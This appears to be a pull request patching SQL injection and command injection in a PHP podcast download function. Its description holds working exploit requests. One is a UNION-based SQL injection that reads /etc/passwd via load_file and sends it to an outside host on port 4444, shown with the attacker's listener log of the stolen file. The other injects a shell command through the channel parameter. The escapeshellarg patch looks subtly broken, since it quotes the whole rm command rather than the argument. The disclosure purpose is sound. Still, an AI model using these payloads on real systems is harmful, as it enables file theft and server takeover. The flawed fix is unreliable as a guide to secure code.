### PR TITLE
Fix SQL and code exec vuln

### DIFF
--- a/includes/podcastfunctions.php
+++ b/includes/podcastfunctions.php
@@ -1057,7 +1057,7 @@ function downloadTrack($key, $channel) {
     debuglog("Downloading ".$key." from ".$channel,"PODCASTS");
     $url = null;
     $filesize = 0;
-    $result = generic_sql_query("SELECT Link, FileSize FROM PodcastTracktable WHERE PODTrackindex = ".$key, false, PDO::FETCH_OBJ);
+    $result = generic_sql_query("SELECT Link, FileSize FROM PodcastTracktable WHERE PODTrackindex = " . intval($key), false, PDO::FETCH_OBJ);
     foreach ($result as $obj) {
         $url = $obj->Link;
         $filesize = $obj->FileSize;
@@ -1090,7 +1090,7 @@ function downloadTrack($key, $channel) {
             sql_prepare_query(true, null, null, null, "UPDATE PodcastTracktable SET Downloaded=?, Localfilename=? WHERE PODTrackindex=?", 1, '/prefs/podcasts/'.$channel.'/'.$key.'/'.$filename, $key);
         } else {
             header('HTTP/1.0 404 Not Found');
-            system ('rm -fR prefs/podcasts/'.$channel.'/'.$key);
+            system (escapeshellarg('rm -fR prefs/podcasts/'.$channel.'/'.$key));
         }
     } else {
         debuglog('Failed to create directory prefs/podcasts/'.$channel.'/'.$key,"PODCASTS",2);


### PR DESCRIPTION
Listener:
```
Listening on [0.0.0.0] (family 0, port 4444)
Connection from <ip> 41332 received!
HEAD /?para=root:x:0:0:root:/root:/bin/bash_daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin_bin:x:2:2:bin:/bin:/usr/sbin/nologin_sys:x:3:3:sys:/dev:/usr/sbin/nologin_sync:x:4:65534:sync:/bin:/bin/sync_games:x:5:60:games:/usr/games:/usr/sbin/nologin_man:x:6:12:man:/var/cache/man:/usr/sbin/nologin_lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin_mail:x:8:8:mail:/var/mail:/usr/sbin/nologin_news:x:9:9:news:/var/spool/news:/usr/sbin/nologin_uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin_proxy:x:13:13:proxy:/bin:/usr/sbin/nologin_www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin_backup:x:34:34:backup:/var/backups:/usr/sbin/nologin_list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin_irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin_gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin_nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_libuuid:x:100:101::/var/lib/libuuid:_syslog:x:101:104::/home/syslog:/bin/false_mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false_ HTTP/1.0
Host: cloud.androidloves.me:4444
```

some fancy exploit for exfiltrating local files via http:

```
GET /includes/podcasts.php?downloadtrack=-1+union+all+select+concat('http://cloud.androidloves.me:4444/?para=',(select+load_file('/etc/passwd'))),-1--&channel=1&populate=1&_=1539618921705&key=123 HTTP/1.1
Host: localhost
Pragma: no-cache
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Content-Type: text/html; charset=utf-8
Accept: */*
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Cookie: currenthost=Default; skin=desktop; player_backend=mpd
Connection: close
Referer: http://localhost/
```

code injection (injects to system; touches /tmp/hacked)

```
GET /includes/podcasts.php?downloadtrack=-1+union+all+select+'https://httpstat.us/403',123--&channel=-1&populate=1&_=1539618921705&channel=;touch+/tmp/hacked; HTTP/1.1
Host: localhost
Pragma: no-cache
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Content-Type: text/html; charset=utf-8
Accept: */*
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Cookie: currenthost=Default; skin=desktop; player_backend=mpd
Connection: close
Referer: http://localhost/
```
If you have any questions please ask
